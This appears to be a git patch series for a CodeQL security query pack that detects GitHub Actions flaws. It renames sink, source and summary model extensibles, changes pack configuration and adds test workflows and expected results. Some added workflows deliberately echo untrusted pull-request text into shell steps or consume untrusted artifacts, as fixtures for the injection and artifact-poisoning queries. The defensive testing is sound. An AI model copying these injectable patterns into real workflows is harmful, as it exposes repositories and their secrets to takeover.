["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 3043c9b30ec..1aabfc23fc4 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index 29d51d1bfbb..d55fdbc3ea9 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index 75a9650a92f..d01ac86d317 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index a85a4b466e2..bab76cbe27f 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index a0c4d6f7ec5..02ac5032c79 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index b5d4629003b..0c484d44549 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index 4b96edeccc2..c088c7a644e 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index ae3ef2e2b1b..5b22ac1f5fe 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 079dfc1fc02..3329a255e6f 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 19edd617c67..14a1cdeed86 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml index 8ab1d090b1c..49931d93f88 100644 --- a/ql/lib/ext/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index 9f8d987c0af..37d0014bcbb 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 90a18103868..9058c9fb984 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index fd484074f5c..713c5c61cea 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 5caaea9562e..40b02283152 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index 9462b8d5bbd..c08505f9747 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"] diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 9b01987e1f2..6305fd33960 100644 --- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 10a3630ea0b..73988096818 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index aac20afddf5..ee9a0dbb32a 100644 --- a/ql/lib/ext/tibdex_backport.model.yml +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 8dcabd1650a..f056cf5d864 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index d98eda4e69f..838f0b30848 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index b8fb2514253..c215755f61d 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"] diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index ae166b1f515..014e779b29a 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index a6cc6884389..806c055529d 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index 499161aafcb..d6e554a8709 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index a352d6c9ff6..55d1531a770 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index 6ed71f18215..c52d62e204a 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 5864c0d0ede..1e915194d96 100644 --- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 173ecfc4222..1cc360c472d 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index 880b0d606da..cb7e0936cca 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index fd8172c6ca8..210c3365eda 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c12..00000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9acfb3035a4..f898f18a295 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,14 +4,13 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.32 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 -dbscheme: yaml.dbscheme -extractor: yaml -groups: - - yaml + codeql/javascript-all: '*' + codeql/util: '*' + codeql/yaml: '*' + codeql/controlflow: '*' + codeql/dataflow: '*' +extractor: javascript +groups: javascript dataExtensions: - ext/*.model.yml - ext/**/*.model.yml diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme deleted file mode 100644 index 20d83c71ee6..00000000000 --- a/ql/lib/yaml.dbscheme +++ /dev/null @@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats deleted file mode 100644 index 1c35ae98402..00000000000 --- a/ql/lib/yaml.dbscheme.stats +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 84a6ccba26d..ce7000fc1b9 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -5,8 +5,14 @@ dependencies: version: 0.1.8 codeql/dataflow: version: 0.1.8 + codeql/javascript-all: + version: 0.5.2 + codeql/regex: + version: 0.0.10 codeql/ssa: version: 0.2.8 + codeql/tutorial: + version: 0.0.7 codeql/typetracking: version: 0.2.8 codeql/util: diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5637bef68a0..4192be6a4ca 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -2,12 +2,11 @@ library: false name: githubsecuritylab/actions-queries version: 0.0.32 -groups: - - actions - - queries +groups: [actions, queries] suites: codeql-suites -extractor: yaml +extractor: javascript defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: + codeql/javascript-all: '*' githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26d..ce7000fc1b9 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -5,8 +5,14 @@ dependencies: version: 0.1.8 codeql/dataflow: version: 0.1.8 + codeql/javascript-all: + version: 0.5.2 + codeql/regex: + version: 0.0.10 codeql/ssa: version: 0.2.8 + codeql/tutorial: + version: 0.0.7 codeql/typetracking: version: 0.2.8 codeql/util: diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index e3304b4fe72..80ebd80b4c2 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -50,13 +50,13 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } query predicate sources(string action, string version, string output, string kind, string provenance) { - sourceModel(action, version, output, kind, provenance) + actionsSourceModel(action, version, output, kind, provenance) } query predicate summaries( string action, string version, string input, string output, string kind, string provenance ) { - summaryModel(action, version, input, output, kind, provenance) + actionsSummaryModel(action, version, input, output, kind, provenance) } query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index d85fc698394..1676d742d37 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,12 +1,10 @@ --- name: githubsecuritylab/actions-tests -groups: - - actions - - test +groups: [javascript, test] dependencies: githubsecuritylab/actions-all: ${workspace} githubsecuritylab/actions-queries: ${workspace} -extractor: yaml +extractor: javascript tests: . warnOnImplicitThis: true From 65b51996a6ff02d2d97e1480a768756ed18af33a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:59:51 +0200 Subject: [PATCH 0315/1267] new tests --- .../security/ArtifactPoisoningQuery.qll | 2 +- .../.github/workflows/artifactpoisoning7.yml | 21 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 +++++++ .../CWE-094/CodeInjectionMedium.expected | 7 +++++++ .../.github/workflows/artifactpoisoning7.yml | 21 +++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + 6 files changed, 59 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 3635004bc31..45d9a08d00a 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -44,7 +44,7 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep ) and ( not exists(this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"])) or - not this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"]) + this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"]) .matches("%github.event.workflow_run.id%") ) and ( diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml new file mode 100644 index 00000000000..e815c3dd129 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml @@ -0,0 +1,21 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + # Save PR id to output + - name: Save artifact data + id: artifact + run: echo "::set-output name=id::$( Date: Mon, 3 Jun 2024 22:17:42 +0200 Subject: [PATCH 0316/1267] Dont consider pull_request with write permissions as priv --- ql/lib/codeql/actions/ast/internal/Ast.qll | 3 ++- .../.github/workflows/priv_pull_request.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 1 + .../Security/CWE-094/CodeInjectionMedium.expected | 2 ++ .../CWE-829/UntrustedCheckoutCritical.expected | 1 - .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 6 files changed, 20 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e31edf7900a..d4864a80e54 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -890,7 +890,8 @@ class JobImpl extends AstNodeImpl, TJobNode { e.isExternallyTriggerable() and // job is privileged (write access or access to secrets) ( - this.isPrivileged() + this.isPrivileged() and + not e.getName() = "pull_request" or not this.isPrivileged() and e.isPrivileged() diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml new file mode 100644 index 00000000000..560e69f9e4b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml @@ -0,0 +1,14 @@ +name: Privileged (only when local) pull request + +on: + pull_request: + +permissions: + pull-requests: write + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.pull_request.body }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 718ef7a4ad1..f7b4ae7bc11 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -174,6 +174,7 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 02000ea2bb0..be5a4e60b72 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -174,6 +174,7 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -282,6 +283,7 @@ subpaths | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | 